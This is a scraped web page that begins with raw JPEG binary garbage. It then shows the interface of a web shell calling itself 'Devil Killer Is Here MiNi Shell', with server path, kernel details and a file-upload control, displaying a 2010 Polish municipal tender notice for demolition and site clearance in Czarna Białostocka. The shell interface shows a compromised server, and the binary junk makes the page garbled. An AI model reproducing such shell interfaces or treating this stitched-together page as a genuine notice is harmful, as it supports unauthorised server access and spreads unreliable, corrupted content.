JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101118/374652-N-2010.html

<p class="kh_header"><b>Czarna Białostocka: Rozbiórka budynków i budowli, wycinka drzew oraz niwelacja terenu Podlaskiego Parku Przemysłowego w Czarnej Białostockiej</b><br>
<b>Numer ogłoszenia: 374652 - 2010; data zamieszczenia: 18.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbiórka budynków i budowli, wycinka drzew oraz niwelacja terenu Podlaskiego Parku Przemysłowego w Czarnej Białostockiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane obejmujące rozbiórkę istniejących budynków i budowli, wycinkę drzew oraz niwelację terenu Podlaskiego Parku Przemysłowego w Czarnej Białostockiej, w szczególności:
1)	Prace rozbiórkowe:
a)	budynku hydroforni oznaczonego literą A na planie zagospodarowania terenu, działka nr geod. 1578/79,  dojazd do miejsca planowanej rozbiórki z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 246,10m2, kubatura obiektu - 1117,21m3.
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach ok.12,98x18,93), wykonanym w technologii tradycyjnej, murowanej (cegła ceramiczna pełna, pustak gazobetonowy) oraz żelbetowej, podpiwniczonym na fragmencie. Budynek składa się z dwóch części - hali oraz zaplecza. Hala przykryta jest dachem dwuspadowym, a zaplecze stropodachem. Budynek na rzucie prostokąta. Składa się z pomieszczenia hali, do którego prowadzi odrębne wejście z zewnątrz oraz 7 pomieszczeń w części zaplecza - do trzech z nich prowadzą wejścia z zewnątrz. Pokrycie zewnętrzne dachu w postaci papy termozgrzewalnej.
b)	budynku stacji transformatorowej oznaczonego literą B na planie zagospodarowania terenu, działka nr geod. 1578/79, dojazd do miejsca planowanej rozbiórki z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy-134,14 m2, kubatura obiektu - 810,5 m3. 
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach zewnętrznych ok.13,68x12,77), wykonanym w technologii tradycyjnej, murowanej (cegła ceramiczna pełna), żelbetowej. Kryty dachem dwuspadowym; pokrycie zewnętrzne stropodachu w postaci papy termozgrzewalnej. Budynek na rzucie kwadratu, składa się z czterech pomieszczeń do których prowadzą oddzielne wejścia. Stalowa stolarka drzwiowa oraz okienna.
c)	budynku hali produkcyjnej oznaczonego literą C na planie zagospodarowania terenu, działka nr geod. 1578/79, dojazd do miejsca planowanej rozbiórki z istniejącego zjazdu z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 1761,43 m2, kubatura obiektu - 8 158,78 m3. 
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach zewnętrznych ok. 83,64x19,59), wykonanym w technologii tradycyjnej, murowanej (cegła ceramiczna pełna),żelbetowej. W części hali produkcyjnej ściany zewnętrzne grubości 38cm, natomiast w części socjalnej ściany zewnętrzne grubości 50cm, ściany wewnętrzne z bloczków gazobetonowych o grubości 25cm. Budynek na rzucie prostokąta, składa się z czterech pomieszczeń: części socjalnej, wentylatorni, niewielkiej dobudówki zlokalizowanej od strony południowej oraz hali produkcyjnej. Stropy o zróżnicowanej konstrukcji: w części hali produkcyjnej występuje strop żelbetowy wylewany oparty na belkach, natomiast w części socjalnej strop żelbetowy monolityczny. Część socjalna kryta jest dachem jednospadowym, hala produkcyjna kryta dachem dwuspadowym, natomiast dobudówka nie posiada przekrycia dachowego. Pokrycie zewnętrzne stropodachu nad całym budynkiem w postaci papy termozgrzewalnej. Od strony północnej zlokalizowana żelbetowa rampa.
d)	budynku hali produkcyjnej oznaczonego literą D na planie zagospodarowania terenu, działka nr geod. 1578/80, dojazd do miejsca planowanej rozbiórki z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 1691,92 m2, kubatura obiektu - 8 301,69 m3.
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach ok. 83,15x20,80), wykonanym w technologii tradycyjnej murowanej o grubości 50cm (cegła ceramiczna pełna), żelbetowej. Budynek na rzucie prostokąta, składa się z czterech pomieszczeń: zaplecza socjalnego (przebieralnie, pomieszczenie socjalne, sanitarne oraz korytarze), hali produkcyjnej, pomieszczenia gospodarczego oraz niewielkiej dobudówki w postaci pomieszczenia kontrolnego. Stropy o zróżnicowanej konstrukcji: w części budynku hali produkcyjnej występuje strop żelbetowy wylewany oparty na belkach, w drugiej części budynku (część socjalna) strop żelbetowy monolityczny. Część socjalna i pomieszczenie kontrolne kryte są dachem jednospadowym, natomiast hala produkcyjna kryta dachem dwuspadowym. Pokrycie zewnętrzne stropodachu nad całym budynkiem w postaci papy termozgrzewalnej. Od strony południowej zlokalizowana żelbetowy podest.
e)	budynku hali produkcyjnej oznaczonego literą E na planie zagospodarowania terenu, działka nr geod. 1578/77, dojazd do miejsca planowanej rozbiórki z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 2469,43 m2, kubatura obiektu - 10212,80 m3.
Wykonany w technologii tradycyjnej murowanej, żelbetowej, pokrycie zewnętrzne dachu i stropodachu w postaci papy termozgrzewalnej. Przedmiotowy obiekt jest budynkiem częściowo jednokondygnacyjnym (o wymiarach ok.133,53x28,53), częściowo dwukondygnacyjnym (o wymiarach ok. 12,41x61,43), o zróżnicowanej wysokości, wykonanym w technologii żelbetowej słupowej i tradycyjnej, murowanej (słupy i siatka podciągów żelbetowych, cegła ceramiczna pełna), jest budynkiem niepodpiwniczonym. Budynek przykryty jest dachem dwuspadowym i stropodachem, wybudowany na rzucie wydłużonego prostokąta. Pokrycie dachu papą termozgrzewalną. Większość powierzchni obiektu stanowi hala o konstrukcji żelbetowej trójnawowej, pozostałą powierzchnię użytkową zajmują pomieszczenia pomocnicze, techniczne i magazynowe. Do budynku prowadzi kilka wejść.
f)	magazynu oznaczonego literą F na planie zagospodarowania terenu, działka nr geod. 1578/56, dojazd do miejsca planowanej rozbiórki z istniejącego zjazdu ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 573,41 m2, kubatura obiektu - 4 587,32 m3.
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach ok. 15,71x36,50), wykonanym w technologii stalowej (stalowe słupy oraz dźwigary kratowe). Ściany nadziemia to cokół murowany o grubości 25cm (sięgający do 151 cm nad poziomem +/-0.00), ściana o grubości 7cm (sięgająca od 151cm nad poziomem +/- 0.00), jej konstrukcję tworzą słupy stalowe obite blachą oraz eternitem (materiał przeznaczony do utylizacji).Występują spore ubytki w wykończeniu ścian (miejscami brak blachy oraz eternitu). Budynek na rzucie prostokąta, z wydzielonym pomieszczeniem wewnątrz magazynu. Pokrycie zewnętrzne dachu stanowi eternit zamocowany do stalowych dźwigarów kratowych. Stalowa stolarka drzwiowa.
 g)	magazynu oznaczonego literą G na planie zagospodarowania terenu, działka nr geod. 1578/56, dojazd do miejsca planowanej rozbiórki z istniejącego zjazdu z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 573,41 m2, kubatura obiektu - 4 587.32 m3.
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym, na rzucie prostokąta (w wymiarach ok. 15,71x36,50) wykonanym w technologii stalowej (stalowe słupy oraz dźwigary kratowe). Ściany nadziemia to cokół murowany o grubości 25cm (sięgający do 151 cm nad poziomem +/-0.00), ściana o grubości 7cm (sięgająca od 151cm nad poziomem +/- 0.00), jej konstrukcję tworzą słupy stalowe obite blachą oraz eternitem (materiał przeznaczony do utylizacji).Występują spore ubytki w wykończeniu ścian (miejscami brak blachy oraz eternitu). Pokrycie zewnętrzne dachu stanowi eternit zamocowany do stalowych dźwigarów kratowych. Stalowa stolarka drzwiowa.
h)	budynku warsztatowego oznaczonego literą H na planie zagospodarowania terenu, działka nr geod. 1578/77, dojazd do miejsca planowanej rozbiórki poprzez  istniejący zjazd z ulicy o nr geod. 1578/78. 
Powierzchnia zabudowy - 620,94 m2, kubatura obiektu- 2429,50 m3.
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach ok. 28,67x24,75), wykonanym w technologii żelbetowej słupowej i tradycyjnej, murowanej (słupy i siatka podciągów żelbetowych, cegła ceramiczna pełna), jest budynkiem niepodpiwniczonym. Budynek przykryty jest dachem dwuspadowym, wybudowany na rzucie kwadratu. Składa się z pomieszczenia hali oznaczonej symbolem 0/3, do którego prowadzi odrębne wejście z zewnątrz oraz z innych pomieszczeń, do których można dostać się przez wejście główne do budynku. Pokrycie zewnętrzne dachu i stropodachu w postaci papy termozgrzewalnej.
i)	budynku warsztatowego oznaczonego literą I na planie zagospodarowania terenu, działka nr geod. 1578/77, dojazd do miejsca planowanej rozbiórki poprzez istniejący zjazd z ulicy o nr geod. 1578/78.
Powierzchnia zabudowy - 584,46 m2,  kubatura obiektu -  2429,50 m3.
Przedmiotowy obiekt jest budynkiem jednokondygnacyjnym (o wymiarach ok. 44,85x13,49), wykonanym w technologii tradycyjnej, murowanej (cegła ceramiczna pełna), jest budynkiem niepodpiwniczonym. Budynek przykryty jest dachem dwuspadowym, wybudowany na rzucie prostokąta. Pokrycie zewnętrzne dachu i stropodachu w postaci papy termozgrzewalnej. Składa się z korytarza znajdującego się na osi środkowej budynku do którego prowadzi odrębne wejście z zewnątrz oraz kilkudziesięciu innych pomieszczeń dostępnych z tego korytarza.
j)	pozostałości  po urządzeniach  służących  do  obsługi zakładów:
rampy załadunkowe i rozładunkowe,
konstrukcje  estakad  sieci technologicznych i cieplnych,
bocznica kolejowa,
utwardzone  place  manewrowe betonowe i  z trylinki,
basen ppoż. 15x15m.
2)	Zakres zadania opisany jako prace rozbiórkowe obejmuje następujący asortyment robót: 
a)	roboty związane z ogrodzeniem i oznakowaniem terenu rozbiórek;
b)	roboty demontażowe wstępne poprzedzające rozbiórkę konstrukcji budynku: 
usunięcie kolidujących z pracami drzew,
przeprowadzenie niwelacji terenu w obrębie wyburzanego budynku w celu zapewnienia dojazdu pojazdom budowlanym,
odcięcie dostawy wszystkich mediów,
zdemontowanie stolarki drzwiowej i okiennej,
zdemontowanie pokrycia dachu,
zdemontowanie wszystkich obróbek blacharskich, elementów stalowych, żaluzji, krat,
zdemontowanie urządzeń, armatury i instalacji wewnętrznych - demontaż instalacji elektrycznych rozpocząć od oprawek, wyłączników itp. a następnie przewodów,
c)	roboty rozbiórkowe z użyciem ciężkich maszyn budowlanych lub roboty rozbiórkowe sposobem mechaniczno - ręcznym;
d)	roboty rozbiórkowe konstrukcji budynku do poziomu posadzki;
e)	roboty rozbiórkowe podłóg i fundamentów;
f)	roboty porządkowe na terenie rozbiórki z niwelacją terenu po dokonaniu demontażu budynków, obiektów pozostałych oraz drzew polegającej na zasypaniu dołów po piwnicach, fundamentach lub całych obiektach budowlanych(np. zbiornik ppoż.) oraz po usuniętych karczach drzew i zakrzaczeń wraz z wyrównaniem całości terenu do +0,20 m powyżej rzędnych określonych w dokumentacji projektowej branży drogowej z możliwym maksymalnym usunięciem istniejących skarp oraz zagęszczeniem mechanicznym dokonanym w celu stabilizacji gruntu ww. miejscach;
g)	roboty związane z demontażem płyt azbestowo-cementowych może wykonać podmiot posiadający decyzję zatwierdzającą program gospodarki odpadami niebezpiecznymi na terenie powiatu białostockiego;
3)	W zakresie wycinki drzew nie objętych dokumentacją rozbiórek budynków, budowli, infrastruktury oraz zieleni:
a)	wykonanie tyczenia geodezyjnego działek nr geod. 1578/56, 1578/77, 1578/78, 1578/79, 1578/80;
b)	wykonanie wycinki drzew i zakrzaczeń z terenu stanowiącego zgodnie z rejestrem gruntów las, oznaczony na inwentaryzacji mieszanej szaty roślinnej i projektu gospodarki drzewostanem kratką koloru ciemnozielonego i symbolem Ls, na działkach nr geod. 1578/77, 1578/80, 1578/56 oraz 1578/79 która stanowi zgodnie z ewidencją gruntów teren przemysłowy (całość w obrysie zakresu od A do R);
c)	pozyskane drewno z powierzchni 1,1111 ha wynikającej z decyzji nr 24/09 (stanowiącej załącznik do SIWZ) Regionalnej Dyrekcji Lasów Państwowych w Białymstoku w sprawie trwałego wyłączenia z produkcji gruntów leśnych oraz z terenu określonego w ww. inwentaryzacji stanowi materiał do zagospodarowania przez wykonującego zadanie, uzyskane w ten sposób środki finansowe należy uwzględnić w cenie ofertowej;
d)	usunięcie karpin z wywiezieniem ich z określonego powyżej terenu;
e)	prace związane w wycinką drzew należy wykonywać poza okresem lęgowym ptaków.
4)	Teren na którym mają być przeprowadzone prace jest uzbrojony w sieć wodociągową i kanalizacyjną (w całości nie użytkowaną i przewidzianą w miarę możliwości do usunięcia) oraz elektroenergetyczną, która w 95% jest wyłączona z użytkowania. Pozostałe 5% stanowi tymczasowe zasilanie PPP w postaci słupowej stacji transformatorowej z podłączonymi dwoma odbiorcami energii elektrycznej na działce nr geod. 1578/55 oraz części działki 1578/77. Ww. słupowa stacja transformatorowa przewidziana jest wraz z siecią zasilająco - dystrybucyjną do demontażu po wykonaniu zasilania głównego  polegającego na doprowadzeniu energii oraz budowie kontenerowej stacji dwutransformatorowej  (linia wzdłuż dz. nr geod. 1578/57 do wydzielonego pod stację terenu z dz. nr geod. 1578/80) przez PGE Oddz. Białystok w oparciu o odrębną umowę.
5)	Na wyżej wymienionym terenie funkcjonuje firma, która zajmuje część piętrową budynku E o powierzchni w rzucie 267 m2 (zaadaptowaną na biuro firmy) usytuowaną w skrajnej, szczytowej części, którą w trakcie prowadzenia rozbiórek należy stosownie zabezpieczyć i dbać o nienaruszenie jego konstrukcji. Przed przystąpieniem do prac rozbiórkowych ww. budynku uzyskać od dzierżawcy pisemne uzgodnienie terminu prowadzenia robót w jego obrębie oraz której należy umożliwić i zapewnić bezkolizyjny dojazd do siedziby, magazynów i hal produkcyjnych.
2.	Szczegółowy zakres prac wszystkich zadań objętych zamówieniem zawierają przedmiary robót (które należy traktować jako materiał pomocniczy), dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót, stanowiące załączniki do niniejszej specyfikacji.
3.	Projekty budowlane oraz specyfikacje techniczne wykonania i odbioru robót w wersji papierowej dostępne są w siedzibie Zamawiającego.
4.	Materiały użyte do montażu powinny posiadać odpowiednie dopuszczenia do stosowania w budownictwie oraz odpowiadać wymaganiom określonym w projekcie budowlanym i w STWiOR.
5.	Wymagania organizacyjne:
1)	w terminie 2-ch tygodni przed końcem kwartału Wykonawca zawiadomi Zamawiającego o zakończeniu etapu robót wynikającego z harmonogramu, który przystąpi do odbioru częściowego zgłoszonego etapu robót;
2)	na podstawie bezusterkowego protokołu odbioru częściowego Wykonawca będzie mógł wystawić fakturę z 30 dniowym terminem płatności;
3)	końcowe rozliczenie nastąpi na podstawie faktury (rachunku) z 30-dniowym terminem płatności, który wykonawca wystawi po podpisaniu protokołu odbioru końcowego  bez uwag;
4)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
5)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia
6.	Wymagania dot. gwarancji:
Wykonawca udzieli Zamawiającemu gwarancji jakości wykonania przedmiotu umowy na okres 36 miesięcy od daty podpisania przez zamawiającego i wykonawcę protokołu końcowego.
7.	Wykonawca w trakcie realizacji zamówienia może składać wnioski i propozycje zmiany sposobu wykonania zamówienia, które przyspieszą ukończenie robót.
8.	Zamawiający dopuszcza wprowadzenie zmian technicznych i technologicznych w urządzeniach, materiałach, w szczególności gdy wystąpi co najmniej jedna z poniższych okoliczności:
1)	konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
2)	zmiany w wymaganiach parametrycznych urządzeń w związku z pojawiającymi się rozwojowymi zmianami techniczno-technologicznymi,
3)	zmiany spowodują racjonalniejsze wykonanie przedmiotu zamówienia.
9.	Zamawiający dopuszczając wprowadzenie zmian sposobu wykonania zamówienia, zmian technicznych i technologicznych w urządzeniach, materiałach nie dopuszcza możliwości zmian w dokumentacji projektowej skutkujących koniecznością uzyskania pozwolenia na budowę oraz wysokości wynagrodzenia.
10.	Wymagania stawiane Wykonawcy:
1)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
2)	wymagana jest należyta staranność przy realizacji zobowiązań umowy;
3)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
4)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;
5)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia;
6)	Wykonawca jest odpowiedzialny za zgodność wykonywanych robót z warunkami technicznymi i jakościowymi właściwymi dla przedmiotu zamówienia.
11.	Wykonawca załączy do oferty harmonogram rzeczowo-finansowy robót w rozbiciu na elementy przewidziane do wykonania w danym kwartale realizacji inwestycji z podaniem kosztów ich wykonania - dla każdego kwartału odrębnie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.13.00-1, 45.11.12.13-4, 45.11.27.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert w wysokości w wysokości 100.000,00 zł (słownie: sto tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 robót budowlanych polegających na robotach rozbiórkowych o wartości zamówienia min. 1.000.000,00 zł brutto w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowaniem kierownikiem budowy posiadającym uprawnienia do kierowania robotami branży budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie ubezpieczenia odpowiedzialności cywilnej w wysokości  min. 1.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

